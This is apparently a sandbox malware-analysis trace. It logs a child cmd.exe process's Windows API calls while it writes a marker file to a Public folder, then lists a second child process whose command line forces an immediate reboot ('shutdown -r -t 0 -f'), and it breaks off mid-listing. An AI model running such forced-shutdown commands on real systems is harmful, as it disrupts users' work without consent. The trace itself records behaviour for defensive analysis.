GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75900000 [0229.192] GetProcAddress (hModule=0x75900000, lpProcName="SetThreadUILanguage") returned 0x759524c2 [0229.192] SetThreadUILanguage (LangId=0x0) returned 0x409 [0229.192] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0229.192] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fe04 | out: phkResult=0x12fe04*=0x0) returned 0x2 [0229.192] VirtualQuery (in: lpAddress=0x12fe3b, lpBuffer=0x12fdd4, dwLength=0x1c | out: lpBuffer=0x12fdd4*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0229.192] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fdd4, dwLength=0x1c | out: lpBuffer=0x12fdd4*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0229.192] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fdd4, dwLength=0x1c | out: lpBuffer=0x12fdd4*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0229.192] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fdd4, dwLength=0x1c | out: lpBuffer=0x12fdd4*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0229.192] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fdd4, dwLength=0x1c | out: lpBuffer=0x12fdd4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0229.192] GetConsoleOutputCP () returned 0x1b5 [0229.193] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a834260 | out: lpCPInfo=0x4a834260) returned 1 [0229.193] SetConsoleCtrlHandler (HandlerRoutine=0x4a82e72a, Add=1) returned 1 [0229.193] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.193] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0229.193] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.193] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8341ac | out: lpMode=0x4a8341ac) returned 1 [0229.193] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.193] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0229.193] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.194] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8341b0 | out: lpMode=0x4a8341b0) returned 1 [0229.194] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.194] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0229.194] GetEnvironmentStringsW () returned 0x2d02a8 [0229.194] FreeEnvironmentStringsW (penv=0x2d02a8) returned 1 [0229.194] GetEnvironmentStringsW () returned 0x2d02a8 [0229.194] FreeEnvironmentStringsW (penv=0x2d02a8) returned 1 [0229.195] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ed74 | out: phkResult=0x12ed74*=0x40) returned 0x0 [0229.195] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ed7c, lpData=0x12ed80, lpcbData=0x12ed78*=0x1000 | out: lpType=0x12ed7c*=0x0, lpData=0x12ed80*=0x58, lpcbData=0x12ed78*=0x1000) returned 0x2 [0229.195] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ed7c, lpData=0x12ed80, lpcbData=0x12ed78*=0x1000 | out: lpType=0x12ed7c*=0x4, lpData=0x12ed80*=0x1, lpcbData=0x12ed78*=0x4) returned 0x0 [0229.195] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ed7c, lpData=0x12ed80, lpcbData=0x12ed78*=0x1000 | out: lpType=0x12ed7c*=0x0, lpData=0x12ed80*=0x1, lpcbData=0x12ed78*=0x1000) returned 0x2 [0229.195] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ed7c, lpData=0x12ed80, lpcbData=0x12ed78*=0x1000 | out: lpType=0x12ed7c*=0x4, lpData=0x12ed80*=0x0, lpcbData=0x12ed78*=0x4) returned 0x0 [0229.195] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ed7c, lpData=0x12ed80, lpcbData=0x12ed78*=0x1000 | out: lpType=0x12ed7c*=0x4, lpData=0x12ed80*=0x40, lpcbData=0x12ed78*=0x4) returned 0x0 [0229.195] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ed7c, lpData=0x12ed80, lpcbData=0x12ed78*=0x1000 | out: lpType=0x12ed7c*=0x4, lpData=0x12ed80*=0x40, lpcbData=0x12ed78*=0x4) returned 0x0 [0229.195] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ed7c, lpData=0x12ed80, lpcbData=0x12ed78*=0x1000 | out: lpType=0x12ed7c*=0x0, lpData=0x12ed80*=0x40, lpcbData=0x12ed78*=0x1000) returned 0x2 [0229.195] RegCloseKey (hKey=0x40) returned 0x0 [0229.195] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ed74 | out: phkResult=0x12ed74*=0x40) returned 0x0 [0229.195] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ed7c, lpData=0x12ed80, lpcbData=0x12ed78*=0x1000 | out: lpType=0x12ed7c*=0x0, lpData=0x12ed80*=0x40, lpcbData=0x12ed78*=0x1000) returned 0x2 [0229.195] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ed7c, lpData=0x12ed80, lpcbData=0x12ed78*=0x1000 | out: lpType=0x12ed7c*=0x4, lpData=0x12ed80*=0x1, lpcbData=0x12ed78*=0x4) returned 0x0 [0229.195] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ed7c, lpData=0x12ed80, lpcbData=0x12ed78*=0x1000 | out: lpType=0x12ed7c*=0x0, lpData=0x12ed80*=0x1, lpcbData=0x12ed78*=0x1000) returned 0x2 [0229.195] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ed7c, lpData=0x12ed80, lpcbData=0x12ed78*=0x1000 | out: lpType=0x12ed7c*=0x4, lpData=0x12ed80*=0x0, lpcbData=0x12ed78*=0x4) returned 0x0 [0229.195] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ed7c, lpData=0x12ed80, lpcbData=0x12ed78*=0x1000 | out: lpType=0x12ed7c*=0x4, lpData=0x12ed80*=0x9, lpcbData=0x12ed78*=0x4) returned 0x0 [0229.196] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ed7c, lpData=0x12ed80, lpcbData=0x12ed78*=0x1000 | out: lpType=0x12ed7c*=0x4, lpData=0x12ed80*=0x9, lpcbData=0x12ed78*=0x4) returned 0x0 [0229.196] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ed7c, lpData=0x12ed80, lpcbData=0x12ed78*=0x1000 | out: lpType=0x12ed7c*=0x0, lpData=0x12ed80*=0x9, lpcbData=0x12ed78*=0x1000) returned 0x2 [0229.196] RegCloseKey (hKey=0x40) returned 0x0 [0229.196] time (in: timer=0x0 | out: timer=0x0) returned 0x57c9314e [0229.196] srand (_Seed=0x57c9314e) [0229.196] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /k echo a > \"C:\\Users\\Public\\N3Eg\\uc\"" [0229.196] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /k echo a > \"C:\\Users\\Public\\N3Eg\\uc\"" [0229.196] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a835260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0229.196] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2d1db0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0229.197] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0229.197] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0229.197] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0229.197] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0229.197] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0229.197] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0229.197] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0229.197] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0229.197] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0229.197] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0229.197] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0229.197] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0229.197] GetEnvironmentStringsW () returned 0x2d02a8 [0229.197] FreeEnvironmentStringsW (penv=0x2d02a8) returned 1 [0229.197] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0229.197] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0229.198] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0229.198] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0229.198] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0229.198] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0229.198] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0229.198] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0229.198] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0229.198] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0229.198] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12fb40 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0229.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x12fb40, lpFilePart=0x12fb3c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x12fb3c*="system32") returned 0x13 [0229.198] GetFileAttributesW (lpFileName="C:\\Windows\\system32") returned 0x10 [0229.198] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x12f8bc | out: lpFindFileData=0x12f8bc) returned 0x2c07f0 [0229.198] FindClose (in: hFindFile=0x2c07f0 | out: hFindFile=0x2c07f0) returned 1 [0229.199] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x12f8bc | out: lpFindFileData=0x12f8bc) returned 0x2c07f0 [0229.199] FindClose (in: hFindFile=0x2c07f0 | out: hFindFile=0x2c07f0) returned 1 [0229.199] GetFileAttributesW (lpFileName="C:\\Windows\\System32") returned 0x10 [0229.199] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0229.199] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0229.199] GetEnvironmentStringsW () returned 0x2d02a8 [0229.199] FreeEnvironmentStringsW (penv=0x2d02a8) returned 1 [0229.199] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a835260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0229.200] GetConsoleOutputCP () returned 0x1b5 [0229.200] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a834260 | out: lpCPInfo=0x4a834260) returned 1 [0229.200] GetUserDefaultLCID () returned 0x409 [0229.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a834950, cchData=8 | out: lpLCData=":") returned 2 [0229.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fc80, cchData=128 | out: lpLCData="0") returned 2 [0229.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fc80, cchData=128 | out: lpLCData="0") returned 2 [0229.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fc80, cchData=128 | out: lpLCData="1") returned 2 [0229.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a834940, cchData=8 | out: lpLCData="/") returned 2 [0229.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a834d80, cchData=32 | out: lpLCData="Mon") returned 4 [0229.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a834d40, cchData=32 | out: lpLCData="Tue") returned 4 [0229.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a834d00, cchData=32 | out: lpLCData="Wed") returned 4 [0229.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a834cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0229.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a834c80, cchData=32 | out: lpLCData="Fri") returned 4 [0229.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a834c40, cchData=32 | out: lpLCData="Sat") returned 4 [0229.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a834c00, cchData=32 | out: lpLCData="Sun") returned 4 [0229.201] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a834930, cchData=8 | out: lpLCData=".") returned 2 [0229.201] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a834920, cchData=8 | out: lpLCData=",") returned 2 [0229.201] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0229.203] GetConsoleTitleW (in: lpConsoleTitle=0x2d2968, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0229.203] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.203] GetFileType (hFile=0x7) returned 0x2 [0229.203] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.203] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12fd7c | out: lpMode=0x12fd7c) returned 1 [0229.203] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.203] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12fd98 | out: lpConsoleScreenBufferInfo=0x12fd98) returned 1 [0229.204] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.204] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12fd64 | out: lpConsoleScreenBufferInfo=0x12fd64) returned 1 [0229.204] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x12fd7c | out: lpNumberOfAttrsWritten=0x12fd7c) returned 1 [0229.204] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0229.205] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75900000 [0229.205] GetProcAddress (hModule=0x75900000, lpProcName="CopyFileExW") returned 0x7593ac6c [0229.205] GetProcAddress (hModule=0x75900000, lpProcName="IsDebuggerPresent") returned 0x75943ea8 [0229.205] GetProcAddress (hModule=0x75900000, lpProcName="SetConsoleInputExeNameW") returned 0x75952732 [0229.206] _wcsicmp (_String1="echo", _String2=")") returned 60 [0229.206] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0229.206] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0229.206] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0229.206] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0229.206] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0229.206] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0229.209] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.209] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.209] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.209] GetFileType (hFile=0x7) returned 0x2 [0229.210] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.210] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12fb78 | out: lpMode=0x12fb78) returned 1 [0229.210] _dup (_FileHandle=1) returned 3 [0229.210] _close (_FileHandle=1) returned 0 [0229.210] _wcsicmp (_String1="C:\\Users\\Public\\N3Eg\\uc", _String2="con") returned -53 [0229.210] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\uc" (normalized: "c:\\users\\public\\n3eg\\uc"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x12fb48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0229.211] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0229.211] GetConsoleTitleW (in: lpConsoleTitle=0x12f978, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0229.211] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0229.212] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0229.212] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0229.212] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0229.212] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0229.212] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0229.212] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0229.212] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0229.212] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0229.212] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0229.213] GetConsoleTitleW (in: lpConsoleTitle=0x2d2c70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0229.213] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\System32\\cmd.exe - echo a ") returned 1 [0229.214] _vsnwprintf (in: _Buffer=0x4a844640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x12f940 | out: _Buffer="a \r\n") returned 4 [0229.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0229.214] GetFileType (hFile=0x4c) returned 0x1 [0229.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0229.214] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="a \r\n", cchWideChar=-1, lpMultiByteStr=0x4a836640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a \r\n", lpUsedDefaultChar=0x0) returned 5 [0229.214] WriteFile (in: hFile=0x4c, lpBuffer=0x4a836640*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x12f92c, lpOverlapped=0x0 | out: lpBuffer=0x4a836640*, lpNumberOfBytesWritten=0x12f92c, lpOverlapped=0x0) returned 1 [0229.216] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 1 [0229.216] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0229.217] _close (_FileHandle=3) returned 0 [0229.218] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.218] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0229.218] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.218] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8341ac | out: lpMode=0x4a8341ac) returned 1 [0229.218] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.218] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8341b0 | out: lpMode=0x4a8341b0) returned 1 [0229.218] SetConsoleInputExeNameW () returned 0x1 [0229.218] GetConsoleOutputCP () returned 0x1b5 [0229.218] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a834260 | out: lpCPInfo=0x4a834260) returned 1 [0229.218] SetThreadUILanguage (LangId=0x0) returned 0x409 [0229.219] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.219] GetFileType (hFile=0x3) returned 0x2 [0229.219] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0229.219] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x12fdf8 | out: lpMode=0x12fdf8) returned 1 [0229.219] NtOpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x12fbb4 | out: TokenHandle=0x12fbb4*=0x0) returned 0xc000007c [0229.219] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fbb4 | out: TokenHandle=0x12fbb4*=0x4c) returned 0x0 [0229.219] NtQueryInformationToken (in: TokenHandle=0x4c, TokenInformationClass=0x12, TokenInformation=0x12fb80, TokenInformationLength=0x4, ReturnLength=0x12fb94 | out: TokenInformation=0x12fb80, ReturnLength=0x12fb94) returned 0x0 [0229.219] NtQueryInformationToken (in: TokenHandle=0x4c, TokenInformationClass=0x1a, TokenInformation=0x12fb8c, TokenInformationLength=0x4, ReturnLength=0x12fb90 | out: TokenInformation=0x12fb8c, ReturnLength=0x12fb90) returned 0x0 [0229.219] NtClose (Handle=0x4c) returned 0x0 [0229.220] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x12fbbc, nSize=0x0, Arguments=0x12fbb8 | out: lpBuffer="ⵀ-﷼\x12썓䪁❈䀀\x02") returned 0xf [0229.220] GetConsoleTitleW (in: lpConsoleTitle=0x12fbf0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0229.220] wcsstr (_Str="C:\\Windows\\System32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0229.220] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\cmd.exe") returned 1 [0229.221] LocalFree (hMem=0x2d2d40) returned 0x0 [0229.221] _vsnwprintf (in: _Buffer=0x4a844640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x12fae4 | out: _Buffer="\r\n") returned 2 [0229.221] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.221] GetFileType (hFile=0x7) returned 0x2 [0229.221] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.221] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12faa4 | out: lpMode=0x12faa4) returned 1 [0229.222] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.222] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a844640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12fad0, lpReserved=0x0 | out: lpBuffer=0x4a844640*, lpNumberOfCharsWritten=0x12fad0*=0x2) returned 1 [0229.222] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0229.222] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a835260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0229.222] _vsnwprintf (in: _Buffer=0x4a835e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x12fae0 | out: _Buffer="C:\\Windows\\system32") returned 19 [0229.222] _vsnwprintf (in: _Buffer=0x4a835e66, _BufferCount=0x3eb, _Format="%c", _ArgList=0x12fae0 | out: _Buffer=">") returned 1 [0229.222] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.222] GetFileType (hFile=0x7) returned 0x2 [0229.222] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.222] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12faa8 | out: lpMode=0x12faa8) returned 1 [0229.223] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.223] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a835e40*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x12fad4, lpReserved=0x0 | out: lpBuffer=0x4a835e40*, lpNumberOfCharsWritten=0x12fad4*=0x14) returned 1 [0229.223] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.223] GetFileType (hFile=0x3) returned 0x2 [0229.223] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.223] GetFileType (hFile=0x3) returned 0x2 [0229.223] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0229.223] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x12fd74 | out: lpMode=0x12fd74) returned 1 [0229.224] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.224] GetFileType (hFile=0x3) returned 0x2 [0229.224] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0229.224] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x12fd74 | out: lpMode=0x12fd74) returned 1 [0229.224] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.224] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.224] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12fd2c | out: lpConsoleScreenBufferInfo=0x12fd2c) returned 1 [0229.224] ReadConsoleW (hConsoleInput=0x3, lpBuffer=0x4a83c640, nNumberOfCharsToRead=0x2000, lpNumberOfCharsRead=0x12fd94, pInputControl=0x12fd44) Process: id = "12" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7f09e5e0" os_pid = "0x660" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x494" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /k shutdown -r -t 0 -f" cur_dir = "C:\\Windows\\system32\\" Region: id = 1270 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1271 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1272 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1273 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1274 start_va = 0x4a810000 end_va = 0x4a85bfff entry_point = 0x4a81829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" Region: id = 1275 start_va = 0x77200000 end_va = 0x7733bfff entry_point = 0x77200000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 1276 start_va = 0x77440000 end_va = 0x77440fff entry_point = 0x77440000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 1277 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1278 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1279 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1304 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1305 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1306 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 1307 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1308 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1309 start_va = 0x6dd80000 end_va = 0x6dd86fff entry_point = 0x6dd81230 region_type = mapped_file name = 